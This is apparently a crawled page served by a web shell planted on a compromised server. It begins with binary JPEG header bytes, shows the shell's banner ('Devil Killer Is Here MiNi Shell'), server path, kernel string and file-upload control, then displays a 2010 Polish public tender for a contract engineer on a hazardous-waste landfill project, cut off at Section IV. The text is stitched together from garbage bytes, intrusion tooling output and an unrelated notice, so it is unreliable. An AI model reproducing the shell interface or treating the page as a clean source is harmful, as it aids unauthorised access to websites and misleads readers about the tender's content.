JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/18078-N-2010.html

<p class="kh_header"><b>Tarnowskie Góry: Świadczenie usług Inżyniera Kontraktu dla Projektu Unieszkodliwienie co najmniej 72 tys. m3 odpadów niebezpiecznych oraz dokończenie rekultywacji kwatery K3 Centralnego Składowiska Odpadów, na terenie byłych Zakładów Chemicznych Tarnowskie Góry w Tarnowskich Górach</b><br>
<b>Numer ogłoszenia: 18078 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Skarb Państwa-Starosta Tarnogórski Wykonujący Zadania z Zakresu Administracji Rządowej , Karłuszowiec 5, 42-600 Tarnowskie Góry, woj. śląskie, tel. 32 381 37 11, faks 32 381 37 27.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług Inżyniera Kontraktu dla Projektu Unieszkodliwienie co najmniej 72 tys. m3 odpadów niebezpiecznych oraz dokończenie rekultywacji kwatery K3 Centralnego Składowiska Odpadów, na terenie byłych Zakładów Chemicznych Tarnowskie Góry w Tarnowskich Górach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest pełnienie obowiązków Inżyniera Kontraktu dla projektu Unieszkodliwienie co najmniej 72 tys. m3 odpadów niebezpiecznych oraz dokończenie rekultywacji kwatery K3 Centralnego Składowiska Odpadów, na terenie byłych Zakładów Chemicznych Tarnowskie Góry w Tarnowskich Górach. Zakresem usługi objęte jest następujące zadanie: Kontrakt na Roboty
Unieszkodliwienie co najmniej 72 tys. m3 odpadów niebezpiecznych oraz dokończenie rekultywacji kwatery K3 Centralnego Składowiska Odpadów, na terenie byłych Zakładów Chemicznych Tarnowskie Góry w Tarnowskich Górach
udzielony będzie w trybie przetargu nieograniczonego; warunki kontraktowe dla robót inżynieryjnych i budowlanych projektowanych przez Zamawiającego (FIDIC - czerwona książka) (Warunki Kontraktowe dla Budowy dla robót inżynieryjno - budowlanych projektowanych przez Zamawiającego - 4. wydanie angielsko - polskie niezmienione 2008 r.; tłumaczenie 1, wydania 1999 - wersja SIDIR - nazywane dalej FIDIC - czerwona książka).
Zadania w ramach niniejszej Umowy będą obejmować wszystkie zadania i funkcje wynikające z Warunków Kontraktowych FIDIC - Czerwona Księga a także inne wymagane, które zostały określone szczegółowo w SIWZ, w szczególności następujące czynności:
a) przygotowanie pełnej dokumentacji przetargowej na wyłonienie Wykonawcy robót dla Projektu pn. Unieszkodliwienie co najmniej 72 tys. m3 odpadów niebezpiecznych oraz dokończenie rekultywacji kwatery K3 Centralnego Składowiska Odpadów, na terenie byłych Zakładów Chemicznych Tarnowskie Góry w Tarnowskich Górach,
b) zarządzanie i administrowanie Kontraktem,
c) monitoring postępu Kontraktu łącznie z raportowaniem, biorąc pod uwagę zarówno wskaźniki rzeczowe jak i finansowe, 
d) zapewnienie profesjonalnego i kompletnego nadzoru inwestorskiego nad robotami, w liczbie pracowników niezbędnych do sprawnego i płynnego realizowania Kontraktu,
e) nadzór nad odbiorami częściowymi i końcowymi, ze szczególnym uwzględnieniem wszystkich rozruchów technologicznych, 
f) zapewnienie przestrzegania i stosowania polskiego prawa przez Wykonawcę, a w szczególności stosowania przepisów Bezpieczeństwa i Higieny Pracy,
g) zapewnienie, że zakończone prace są zgodne z technicznymi i formalnymi wymaganiami Kontraktu,
h) bieżące oraz końcowe rozliczenie rzeczowe i finansowe Kontraktu,
i) wszelkie inne obowiązki związane z zarządzaniem projektem, nadzorem inwestorskim nad prowadzeniem Robót oraz rozliczeniem Kontraktu, wynikające z przepisów prawa, uwarunkowań realizowanych Kontraktu, a w szczególności wymagań instytucji finansujących, sztuki budowlanej i inżynierskiej oraz dobrych praktyk zarządzania projektami.
Inżynier Kontraktu będzie wykonywać swoje obowiązki w ścisłej współpracy z Zamawiającym, zgodnie z jego poleceniami i obowiązującymi przepisami.
Inżynier Kontraktu będzie odpowiedzialny za nadzorowanie Kontraktu, zgodnie z podanym szczegółowym opisem zadań i obowiązków.
Inżynier Kontraktu będzie wykonywał swoje obowiązki na terenie Miasta Tarnowskie Góry. Należy również przewidzieć krótkoterminowe wyjazdy do instytucji powiązanych z Kontraktem.
Szczegółowy opis i zakres przedmiotu zamówienia przedstawiony został w Części III specyfikacji istotnych warunków zamówienia -SIWZ.
Zamawiający dopuszcza możliwość powierzenia części zamówienia podwykonawcom, za wyjątkiem zarządzania projektem w rozumieniu czynności wykonywanych przez Kierownika Zespołu. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.63.00.00-3, 71.52.10.00-6, 71.53.00.00-2, 71.54.00.00-5, 71.54.10.00-2, 71.63.10.00-0, 71.63.13.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 22.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienie wadium w wysokości 14.000,00 PLN.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu, opis sposobu dokonywania oceny ich spełniania oraz dokumenty potwierdzające spełnianie warunków udziału w postępowaniu.
1.Zgodnie z art. 22, ust. 1 ustawy Prawo zamówien publicznych, zwanej dalej ustawą, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1) Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2) Posiadania wiedzy i doświadczenia,
3) Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4) Sytuacji ekonomicznej i finansowej.
2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu oraz wykaz oświadczeń i dokumentów jakie mają złożyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu: 
1) Wykonawca składający ofertę ma wykazać dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia. W szczególności Wykonawca musi wykazać spełnianie następujących warunków dotyczących (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a) posiadania średniego rocznego zatrudnienia i liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w wysokości co najmniej 20 pracowników w tym co najmniej 5 osób kadry kierowniczej. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć oświadczenie - Informację na temat liczby zatrudnionych pracowników sporządzoną według wzoru stanowiącego załącznik nr 3 do I części SIWZ,
b) dysponowania osobami zdolnymi (kluczowi eksperci) do wykonania niniejszego zamówienia. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są wskazać te osoby, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, 
a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami, co najmniej:
- Kierownika Zespołu (Ekspert 1), mającego doświadczenie w zarządzaniu robotami jako lider zespołu lub menadżer projektu z zakresu gospodarki odpadami, posiadającego doświadczenie w pełnieniu roli Kierownika Zespołu dla przynajmniej jednej inwestycji z zakresu gospodarki odpadami realizowanej według warunków kontraktowych FIDIC o wartości robót powyżej 15 mln PLN (bez VAT),
- Inspektora sanitarnego (Ekspert 2), mającego co najmniej 5 letnie doświadczenie w nadzorze wykonania robót instalacyjnych; posiadającego uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz doświadczenie nabyte w pełnieniu funkcji inspektora nadzoru przy realizacji co najmniej 2 projektów dotyczących budowy lub rekultywacji składowiska odpadów,
- Inspektora elektryka (Ekspert 3), mającego co najmniej 5 letnie doświadczenie w nadzorze wykonania sieci elektroenergetycznych oraz układów AKPiA; posiadającego uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
- Inspektora budowlanego (Ekspert 4), mającego co najmniej 5 letnie doświadczenie w nadzorze wykonywania robót z zakresu konstrukcyjno - budowlanego; oraz doświadczenie nabyte w pełnieniu funkcji inspektora nadzoru przy realizacji co najmniej 2 projektów dotyczących budowy lub rekultywacji składowiska odpadów, posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
- Inspektora drogowego (Ekspert 5), mającego co najmniej 5 letnie doświadczenie w nadzorze wykonania dróg; posiadającego uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej,
- Eksperta Finansowego (Ekspert 6), mającego doświadczenie zawodowe w zakresie zarządzania finansami projektów infrastrukturalnych, w tym udział w rozliczeniu co najmniej 2 projektów współfinansowanych ze środków UE i/lub NFOŚiGW i/lub WFOŚiGW o wartości nie mniejszej niż 15 mln PLN (bez VAT), realizowanych wg Warunków kontraktowych FIDIC,
- Ekspert ds. kosztorysowania i obmiaru (Ekspert 7), mającego doświadczenie w weryfikacji i sporządzaniu kosztorysów i/lub obmiarów dla co najmniej 2 projektów współfinansowanych ze środków UE i/lub NFOŚiGW i/lub WFOŚiGW o wartości nie mniejszej niż 15 mln PLN (bez VAT), realizowanych wg Warunków kontraktowych FIDIC,
- Ekspert ds. zamówień publicznych (Ekspert 8) - co najmniej 3 letnie doświadczenie w opracowywaniu specyfikacji istotnych warunków zamówienia w zakresie projektów obejmujących budowę infrastruktury technicznej, wraz z ogłoszeniem postępowania, którego dotyczyły oraz zawarciem umów w sprawie zamówienia publicznego, zgodnie z ustawą o zamówieniach publicznych lub ustawą Prawo zamówień publicznych, w tym co najmniej trzech w ramach zamówień na roboty budowlane, dla których istniał obowiązek ogłoszenia w Dzienniku Urzędowym Unii Europejskiej,
Uwaga!: Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć: wykaz sporządzony według wzoru stanowiącego załącznik nr 4 
do I części SIWZ oraz informacje o osobach, które będą uczestniczyć w wykonywaniu niniejszego zamówienia sporządzone wg wzoru stanowiącego załącznik nr 5 do I części SIWZ oraz oświadczenie potwierdzające że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane prawem uprawnienia i aktualne wpisy do właściwych izb samorządowych. Wszyscy kluczowi specjaliści muszą posiadać biegłą znajomość języka polskiego lub w przypadku, gdy wskazani kluczowi specjaliści nie posiadają biegłej znajomości języka polskiego, Wykonawca jest zobowiązany zapewnić tłumacza na okres i dla potrzeb realizacji umowy.
Wymagane w tym punkcie okresy doświadczenia zawodowego, należy liczyć od dnia wszczęcia niniejszego postępowania o udzielenie zamówienia wstecz.
2) Wykonawca składający ofertę ma wykazać posiadanie wiedzy i doświadczenia, tj. Wykonawca składający ofertę ma wykazać wykonanie (lub wykonywanie w przypadku świadczeń okresowych lub ciągłych) w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (w przypadku wspólnego ubiegania się dwóch 
lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna wiedza i doświadczenie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku):
- co najmniej jednej usługi, której przedmiotem było zarządzanie i nadzorowanie inwestycji polegającej na budowie lub rekultywacji składowiska odpadów niebezpiecznych realizowanej wg Warunków kontraktowych FIDIC, o wartości robót budowlanych nie mniejszej niż 15 mln PLN (bez VAT); współfinansowanej ze środków UE i/lub NFOŚiGW i/lub WFOŚiGW,
- minimum trzech usług obejmujących opracowanie Specyfikacji Istotnych Warunków Zamówienia  w zakresie budowy infrastruktury technicznej, zgodnie z ustawą Prawo zamówień publicznych oraz warunkami umowy FIDIC dla robót budowlanych, których wartość robót była równa lub przekraczała kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Prawo zamówień publicznych, w  oparciu o które opublikowano ogłoszenie o zamówieniu oraz zawarto umowy w sprawie zamówienia publicznego. 
Za zakończoną/ wykonaną uważa się usługę, dla której wydano Świadectwo Przejęcia.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych (wykonywanych) usług z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców sporządzony według wzoru stanowiącego załącznik nr 6 do części I SIWZ oraz dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie.
3) Wykonawca składający ofertę ma wykazać spełnienie warunków dotyczących sytuacji ekonomicznej i finansowej, w szczególności Wykonawca musi wykazać spełnienie warunków dotyczących (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty 
ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku):
a) osiągnięcia w każdym z ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przychodu netto ze sprzedaży wynoszącego co najmniej 5 mln PLN. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć sprawozdanie finansowe lub jego część (rachunek zysków i strat). Jeżeli sprawozdanie finansowe podlega badaniu 
przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu lub jego części (rachunku zysków i strat). W przypadku Wykonawcy nie zobowiązanego do sporządzania sprawozdania finansowego (rachunku zysków i strat), załącza inne dokumenty określające roczny łączny przychód - przychody netto ze sprzedaży - za okres ostatnich 3 lat obrotowych 
z osobna, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. Dla potwierdzenia spełnienia tego warunku przez Wykonawców składających ofertę wspólną wystarczy złożenie tego (-ch) dokumentów przez tego(-ch) Wykonawcę(ów), który(-rzy) spełniają postawiony warunek.
b) posiadania środków finansowych w wysokości co najmniej 1 mln PLN lub posiadania jednoznacznie określonej zdolności kredytowej w wysokości co najmniej 1 mln PLN.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Dla potwierdzenia spełnienia tego warunku przez Wykonawców składających ofertę wspólną wystarczy złożenie tego (-ch) dokumentu (-ów) przez tego(-ch) Wykonawcę(ów), który(-rzy) spełnia (-ją) postawiony warunek.
c) posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności. W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę o wielkości minimum 150 % wartości ceny ofertowej
3. Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w punkcie 5.
4. Jeżeli wykonawca wykazując spełnianie warunku, o którym mowa w punkcie 2. 3) polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wymaga się przedłożenia informacji, o której mowa w punkcie 2. 3). b) dotyczącej tych podmiotów.
5. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Wykonawca składający ofertę w niniejszym postępowaniu ma załączyć następujące dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich): 
1) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy;
2) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 
pkt 5-8 ustawy mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust.1 pkt 5-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
z tym że w przypadku, gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób.
7. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punktach 5. 1), 2), 3), 5) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
8.  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa w punkcie 5. 4) - składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
9. Dokumenty, o których mowa w punkcie 7. 1) i 3) oraz pkt 8, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w punkcie 7. 2) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 7 i 8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapis punktu 9 stosuje się odpowiednio.
11. Wykonawca składa wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu i braku podstaw do wykluczenia, sporządzone według wzoru stanowiącego załącznik nr 2 do I części SIWZ (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców przedmiotowe oświadczenie może być złożone wspólnie i podpisane przez upoważnionych przedstawicieli każdego z tych wykonawców, lub przez Pełnomocnika upoważnionego do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.)
12. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę wraz z ofertą.
13. W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż w PLN, zamawiający jako kurs przeliczeniowy waluty, w której oszacowano warunki finansowo-ekonomiczne przyjmie średni kurs NBP z dnia opublikowania ogłoszenia o zamówieniu. 
14. Wykonawca jest zobowiązany wykazać nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w art. 22, ust. 1 ustawy i brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy.
15. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
16. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku..</li>
</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
